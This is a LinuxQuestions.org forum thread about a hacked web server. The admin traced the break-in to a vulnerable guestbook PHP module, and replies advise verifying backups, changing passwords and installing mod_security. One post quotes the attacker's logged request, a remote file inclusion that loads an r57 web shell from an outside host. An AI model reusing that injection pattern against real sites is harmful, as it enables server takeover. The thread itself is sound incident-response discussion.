Linux - SecurityThis forum is for all security related questions.
Questions, tips, system compromises, firewalls, etc. are all included here.
Notices
Welcome to LinuxQuestions.org, a friendly and active Linux Community.
You are currently viewing LQ as a guest. By joining our community you will have the ability to post topics, receive our newsletter, use the advanced search, subscribe to threads and access many other special features. Registration is quick, simple and absolutely free. Join our community today!
Note that registered members see fewer ads, and ContentLink is completely disabled once you log in.
If you have any problems with the registration process or your account login, please contact us. If you need to reset your password, click here.
Having a problem logging in? Please visit this page to clear all LQ-related cookies.
Get a virtual cloud desktop with the Linux distro that you want in less than five minutes with Shells! With over 10 pre-installed distros to choose from, the worry-free installation life is here! Whether you are a digital nomad or just looking for flexibility, Shells can put your Linux machine on the device that you want to use.
Exclusive for LQ members, get up to 45% off per month. Click here for more info.
So.. it was some form of injection attack on the guestbook php which gained some kind of write permissions?
Is that as far as compromisation got before you restored the server? Are you sure admin wasnt taken? You changed the password after restore?
Are you certain the restore is not itself a compromised backup with previous intrusions? Spotting one attack in progress does not always mean that was all that was done or for how long.
For now I would look for a better guestbook or remove that feature.
And look to hardening the box as suggested earlier. I do not think your problem is solved yet until everything mentioned earlier is covered. Good luck.
OK Hacked again...got his IP 88.230.29.147 and found how he got in...
POST /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.turkbanner.net/lang/r57.jpg? HTTP/1.1
I am deleting this module...
You probably have insecure software here. It's no use just removing that module. Is the developer aware of this compromise (r57 injection). You should also know that if they got access through r57 then they may have installed other software - have you checked and found anything? Has the developer released an updated package that will prevent this form of injection?
Do yourself a favour and investigate & implement mod-security ( http://www.modsecurity.org )asap if you are running php apps. Trust me I learnt the hard way a year or so ago when someone attacked a faulty php app with r57.
sorry, didn't have time to reply earlier.
Yes all passwords changed. Mod security installed (still need a bit of config but it will come).
The restored backup comes from another server that is 'clean'...(local server).
File comparision done and yes there where other uploaded files!
Honestly I played with this shell to see what it was capable of...nice job ;-).
So now, I take a bit of my time to configure modsecurity and to optimize it.
Almost no Windows user could tell you what every file is on their system
Ummm - I don't think I could tell you what EVERY file on my UNIX or Linux system is either. I might tell you whether it is a binary, device, script, text (that is to say TYPE of file) but to actually know the purpose of all the binaries, config files and libraries one gets by default seems a bit much.
Not to say M$ isn't a joke of an OS but expecting people to know what every one of 16,000 to 20,000 files do seems a bit much. Even IT security auditors just check for setuid etc... rather than trying to determine if every file has meaning.
Even if one knew what the files "usually" were there is no guarantee they haven't been modified in some way.
More on this later - first I have to investigate my Solaris "Door" files further...
sorry, didn't have time to reply earlier.
Yes all passwords changed. Mod security installed (still need a bit of config but it will come).
The restored backup comes from another server that is 'clean'...(local server).
File comparision done and yes there where other uploaded files!
Honestly I played with this shell to see what it was capable of...nice job ;-).
So now, I take a bit of my time to configure modsecurity and to optimize it.
Thanks a lot for all you replies!!!
macadam
Good stuff, if you need some help with Mod security 1x rulesets let me know.
thank you for your proposal. I will come to you if needed ;-)
For the moment, I manage quite well the rules (I have version 2).
I am impressed by this tool...very efficient.
And it even comes with a good 'standard rules' package.
LinuxQuestions.org is looking for people interested in writing
Editorials, Articles, Reviews, and more. If you'd like to contribute
content, let us know.